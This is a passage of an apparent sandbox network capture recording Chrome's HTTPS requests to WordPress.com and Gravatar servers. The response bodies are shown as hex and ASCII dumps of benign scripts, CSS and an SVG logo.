                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC385OUTGET /wp-content/js/mobile-useragent-info.js?m=1609849039i HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s1.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 6113
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/11978-1684465249013.7231
                                                                                                                                                                                                                                                                  Expires: Fri, 30 May 2025 21:09:59 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC888INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 7b 50 4c 41 54 46 4f 52 4d 5f 57 49 4e 44 4f 57 53 3a 22 77 69 6e 64 6f 77 73 22 2c 50 4c 41 54 46 4f 52 4d 5f 49 50 48 4f 4e 45 3a 22 69 70 68 6f 6e 65 22 2c 50 4c 41 54 46 4f 52 4d 5f 49 50 4f 44 3a 22 69 70 6f 64 22 2c 50 4c 41 54 46 4f 52 4d 5f 49 50 41 44 3a 22 69 70 61 64 22 2c 50 4c 41 54 46 4f 52 4d 5f 42 4c 41 43 4b 42 45 52 52 59 3a 22 62 6c 61 63 6b 62 65 72 72 79 22 2c 50 4c 41 54 46 4f 52 4d 5f 42 4c 41 43 4b 42 45 52 52 59 5f 31 30 3a 22 62 6c 61 63 6b 62 65 72 72 79 5f 31 30 22 2c 50 4c 41 54 46 4f 52 4d 5f 53 59 4d 42 49 41 4e 3a 22 73 79 6d 62 69 61 6e 5f 73 65 72 69 65 73 36 30 22 2c 50 4c 41 54 46 4f 52 4d 5f 53 59 4d 42 49 41 4e 5f 53 34 30 3a 22 73 79 6d 62 69 61 6e 5f 73 65 72
                                                                                                                                                                                                                                                                  Data Ascii: (function(e){var i={PLATFORM_WINDOWS:"windows",PLATFORM_IPHONE:"iphone",PLATFORM_IPOD:"ipod",PLATFORM_IPAD:"ipad",PLATFORM_BLACKBERRY:"blackberry",PLATFORM_BLACKBERRY_10:"blackberry_10",PLATFORM_SYMBIAN:"symbian_series60",PLATFORM_SYMBIAN_S40:"symbian_ser
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 74 4e 61 6d 65 21 3d 3d 66 61 6c 73 65 29 72 65 74 75 72 6e 20 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3b 69 66 28 69 2e 75 73 65 72 41 67 65 6e 74 3d 3d 3d 66 61 6c 73 65 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 69 66 28 69 2e 69 73 43 68 72 6f 6d 65 46 6f 72 49 4f 53 28 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 63 68 72 6f 6d 65 2d 66 6f 72 2d 69 6f 73 22 3b 65 6c 73 65 20 69 66 28 69 2e 69 73 54 77 69 74 74 65 72 46 6f 72 49 70 61 64 28 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 74 77 69 74 74 65 72 2d 66 6f 72 2d 69 70 61 64 22 3b 65 6c 73 65 20 69 66 28 69 2e 69 73 54 77 69 74 74 65 72 46 6f 72 49 70 68 6f 6e 65 28 29 29 69 2e 6d 61 74 63 68 65 64 55 73
                                                                                                                                                                                                                                                                  Data Ascii: tName!==false)return i.matchedUserAgentName;if(i.userAgent===false)return false;if(i.isChromeForIOS())i.matchedUserAgentName="chrome-for-ios";else if(i.isTwitterForIpad())i.matchedUserAgentName="twitter-for-ipad";else if(i.isTwitterForIphone())i.matchedUs
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 20 69 66 28 69 2e 69 73 57 6f 72 64 50 72 65 73 73 46 6f 72 49 6f 73 28 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 69 6f 73 2d 61 70 70 22 3b 65 6c 73 65 20 69 66 28 72 28 22 69 70 68 6f 6e 65 22 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 69 70 68 6f 6e 65 2d 75 6e 6b 6e 6f 77 6e 22 3b 65 6c 73 65 20 69 66 28 72 28 22 69 70 61 64 22 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 69 70 61 64 2d 75 6e 6b 6e 6f 77 6e 22 3b 72 65 74 75 72 6e 20 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 7d 2c 67 65 74 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61
                                                                                                                                                                                                                                                                  Data Ascii: if(i.isWordPressForIos())i.matchedUserAgentName="ios-app";else if(r("iphone"))i.matchedUserAgentName="iphone-unknown";else if(r("ipad"))i.matchedUserAgentName="ipad-unknown";return i.matchedUserAgentName},getPlatformName:function(){if(i.matchedPlatformNa
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 4f 52 4d 5f 4d 4f 42 49 4c 45 5f 47 45 4e 45 52 49 43 7d 72 65 74 75 72 6e 20 69 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 7d 2c 67 65 74 42 6c 61 63 6b 42 65 72 72 79 4f 53 56 65 72 73 69 6f 6e 3a 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 2e 69 73 42 6c 61 63 6b 62 65 72 72 79 31 30 28 29 29 72 65 74 75 72 6e 22 31 30 22 3b 69 66 28 21 72 28 22 62 6c 61 63 6b 62 65 72 72 79 22 29 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 76 61 72 20 65 3d 2d 31 3b 76 61 72 20 61 3b 69 66 28 72 28 22 77 65 62 6b 69 74 22 29 29 7b 61 3d 2f 56 65 72 73 69 6f 6e 5c 2f 28 5b 5c 64 5c 2e 5d 2b 29 2f 69 7d 65 6c 73 65 7b 61 3d 2f 42 6c 61 63 6b 42 65 72 72 79 5c 77 2b 5c 2f 28 5b 5c 64 5c 2e 5d 2b 29 2f 69 7d 69 66 28 61 2e 65 78 65 63 28 69 2e 75 73
                                                                                                                                                                                                                                                                  Data Ascii: ORM_MOBILE_GENERIC}return i.matchedPlatformName},getBlackBerryOSVersion:a(function(){if(i.isBlackberry10())return"10";if(!r("blackberry"))return false;var e=-1;var a;if(r("webkit")){a=/Version\/([\d\.]+)/i}else{a=/BlackBerry\w+\/([\d\.]+)/i}if(a.exec(i.us
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1118INData Raw: 22 73 65 72 69 65 73 36 30 22 29 7d 65 6c 73 65 20 69 66 28 72 28 22 73 79 6d 62 69 61 6e 6f 73 22 29 26 26 72 28 22 73 65 72 69 65 73 36 30 22 29 29 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 65 6c 73 65 20 69 66 28 72 28 22 6e 6f 6b 69 61 22 29 26 26 72 28 22 73 65 72 69 65 73 36 30 22 29 29 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 65 6c 73 65 20 69 66 28 72 28 22 6f 70 65 72 61 20 6d 69 6e 69 22 29 29 7b 72 65 74 75 72 6e 20 72 28 22 73 79 6d 62 69 61 6e 6f 73 22 29 7c 7c 72 28 22 73 79 6d 62 6f 73 22 29 7c 7c 72 28 22 73 65 72 69 65 73 20 36 30 22 29 7d 7d 29 2c 69 73 4b 69 6e 64 6c 65 46 69 72 65 3a 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 73 69 6c 6b 2f 22 29 26 26 72 28 22 73 69 6c 6b 2d 61 63 63 65 6c 65 72 61 74 65 64 3d 22
                                                                                                                                                                                                                                                                  Data Ascii: "series60")}else if(r("symbianos")&&r("series60")){return true}else if(r("nokia")&&r("series60")){return true}else if(r("opera mini")){return r("symbianos")||r("symbos")||r("series 60")}}),isKindleFire:a(function(){return r("silk/")&&r("silk-accelerated="


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  20192.168.2.1649727192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC708OUTGET /wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s0.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://s0.wp.com/wp-content/blog-plugins/marketing-bar/css/marketing-bar.css?m=1729529312i&cssminify=yes
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                  Content-Length: 1237
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 19 May 2023 01:49:09 GMT
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  ETag: "6466d595-4d5"
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Expires: Fri, 24 Jan 2025 09:24:43 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC875INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 31 32 20 38 31 32 2e 30 32 22 20 66 69 6c 6c 3d 22 23 31 30 31 35 31 37 22 3e 3c 74 69 74 6c 65 3e 77 6f 72 64 70 72 65 73 73 64 6f 74 63 6f 6d 2d 6d 61 72 6b 2d 62 6c 61 63 6b 3c 2f 74 69 74 6c 65 3e 3c 67 20 69 64 3d 22 4c 61 79 65 72 5f 32 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 32 22 3e 3c 67 20 69 64 3d 22 42 6c 61 63 6b 5f 57 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 42 6c 61 63 6b 20 57 22 3e 3c 70 61 74 68 20 64 3d 22 4d 34 30 36 2c 30 43 31 38 32 2e 31 33 2c 30 2c 30 2c 31 38 32 2e 31 33 2c 30 2c 34 30 36 53 31 38 32 2e 31 33 2c 38 31 32 2c 34 30 36 2c 38 31 32 2c 38 31 32
                                                                                                                                                                                                                                                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 812 812.02" fill="#101517"><title>wordpressdotcom-mark-black</title><g id="Layer_2" data-name="Layer 2"><g id="Black_W" data-name="Black W"><path d="M406,0C182.13,0,0,182.13,0,406S182.13,812,406,812,812
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC362INData Raw: 33 36 33 2e 36 31 2c 33 36 33 2e 36 31 2c 30 2c 30 2c 31 2c 32 34 36 2e 34 39 2c 39 35 2e 38 34 63 2d 31 2e 35 36 2d 2e 31 31 2d 33 2e 31 2d 2e 33 2d 34 2e 37 32 2d 2e 33 2d 33 35 2e 38 36 2c 30 2d 36 31 2e 33 2c 33 31 2e 32 33 2d 36 31 2e 33 2c 36 34 2e 37 39 2c 30 2c 33 30 2e 30 38 2c 31 37 2e 33 35 2c 35 35 2e 35 32 2c 33 35 2e 38 36 2c 38 35 2e 36 31 2c 31 33 2e 38 37 2c 32 34 2e 33 31 2c 33 30 2e 30 39 2c 35 35 2e 35 34 2c 33 30 2e 30 39 2c 31 30 30 2e 36 36 71 30 2c 34 36 2e 38 39 2d 32 37 2e 37 38 2c 31 31 38 4c 35 38 38 2e 32 32 2c 36 32 37 2e 32 34 5a 4d 35 38 39 2e 35 32 2c 37 32 31 2e 35 2c 37 30 31 2c 33 39 39 2e 31 35 63 32 30 2e 38 34 2d 35 32 2e 30 38 2c 32 37 2e 37 37 2d 39 33 2e 37 32 2c 32 37 2e 37 37 2d 31 33 30 2e 37 34 61 32 37 39 2e
                                                                                                                                                                                                                                                                  Data Ascii: 363.61,363.61,0,0,1,246.49,95.84c-1.56-.11-3.1-.3-4.72-.3-35.86,0-61.3,31.23-61.3,64.79,0,30.08,17.35,55.52,35.86,85.61,13.87,24.31,30.09,55.54,30.09,100.66q0,46.89-27.78,118L588.22,627.24ZM589.52,721.5,701,399.15c20.84-52.08,27.77-93.72,27.77-130.74a279.


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  21192.168.2.1649734192.0.73.24437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC643OUTGET /js/hovercards/hovercards.min.css?ver=202444448e29c9ec460f70535c7958cd60e9e2980f935c5309d61d08f40d080a876779 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 0.gravatar.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC423INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/css
                                                                                                                                                                                                                                                                  Content-Length: 3612
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 16 Sep 2024 08:53:14 GMT
                                                                                                                                                                                                                                                                  ETag: "66e7f1fa-e1c"
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                                  Expires: Tue, 05 Nov 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=604800
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC946INData Raw: 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 30 30 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 68 34 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 70 7b 6d 61 72 67 69 6e 3a 30 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 61 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 69 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 70 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 20 50 72 6f 20 54 65 78 74 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c
                                                                                                                                                                                                                                                                  Data Ascii: .gravatar-hovercard{display:inline-block;z-index:10000000}.gravatar-hovercard h4,.gravatar-hovercard p{margin:0}.gravatar-hovercard a,.gravatar-hovercard i,.gravatar-hovercard p{color:#000;font-family:SF Pro Text,-apple-system,BlinkMacSystemFont,Segoe UI,
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 6f 76 65 72 63 61 72 64 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 70 65 72 73 6f 6e 61 6c 2d 69 6e 66 6f 2d 6c 69 6e 6b 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 6e 61 6d 65 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 2d 63 6c 61 6d 70 3a 32 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 54 61 68 6f 6d 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70
                                                                                                                                                                                                                                                                  Data Ascii: overcard .gravatar-hovercard__personal-info-link{text-decoration:none}.gravatar-hovercard .gravatar-hovercard__name{display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;color:#000;font-family:Helvetica,Arial,Tahoma,sans-serif;font-size:18p
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1297INData Raw: 72 63 61 72 64 5f 5f 70 72 6f 66 69 6c 65 2d 6c 69 6e 6b 2d 2d 65 64 69 74 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 70 72 6f 66 69 6c 65 2d 6c 69 6e 6b 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 31 64 34 66 63 34 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 70 72 6f 66 69 6c 65 2d 6c 69 6e 6b 2d 2d 65 64 69 74 20 70 61 74 68 7b 73 74 72 6f 6b 65 3a 23 31 64 34 66 63 34 7d 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 2d 2d 73 6b 65 6c 65 74 6f 6e 20 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 61 76 61 74 61 72 2d 6c 69 6e 6b 2c 2e 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 2d 2d 73 6b 65 6c 65 74 6f 6e 20 2e 67 72
                                                                                                                                                                                                                                                                  Data Ascii: rcard__profile-link--edit .gravatar-hovercard__profile-link-text{color:#1d4fc4}.gravatar-hovercard .gravatar-hovercard__profile-link--edit path{stroke:#1d4fc4}.gravatar-hovercard--skeleton .gravatar-hovercard__avatar-link,.gravatar-hovercard--skeleton .gr


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  22192.168.2.1649732192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC343OUTGET /w.js?67 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: stats.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC433INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 12788
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/12827-1705538370002.5403
                                                                                                                                                                                                                                                                  Expires: Fri, 17 Jan 2025 00:39:49 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  X-nc: HIT dfw
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC936INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 6f 29 7b 69 66 28 65 5b 6f 5d 29 72 65 74 75 72 6e 20 65 5b 6f 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 65 5b 6f 5d 3d 7b 69 3a 6f 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6f 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6f 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6f 7d 29 7d 2c 6e 2e 72 3d 66 75 6e
                                                                                                                                                                                                                                                                  Data Ascii: !function(t){var e={};function n(o){if(e[o])return e[o].exports;var r=e[o]={i:o,l:!1,exports:{}};return t[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=t,n.c=e,n.d=function(t,e,o){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:o})},n.r=fun
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 20 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 74 2e 65 78 70 6f 72 74 73 3d 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 74 2e 65 78 70 6f 72 74 73 3d 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 74 7d 2c 6e 28 65 29 7d 74 2e 65 78 70 6f 72 74 73 3d 6e 7d
                                                                                                                                                                                                                                                                  Data Ascii: n(e){return"function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?t.exports=n=function(t){return typeof t}:t.exports=n=function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},n(e)}t.exports=n}
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 5b 72 5d 2e 73 75 62 73 74 72 69 6e 67 28 6e 29 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 29 3b 76 61 72 20 6f 3d 6e 28 30 29 2c 72 3d 6e 2e 6e 28 6f 29 2c 69 3d 6e 28 31 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 76 61 72 20 65 3d 5b 5d 3b 69 66 28 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 65 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 74 29 2c 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 2e 67 65 74 52 61 6e
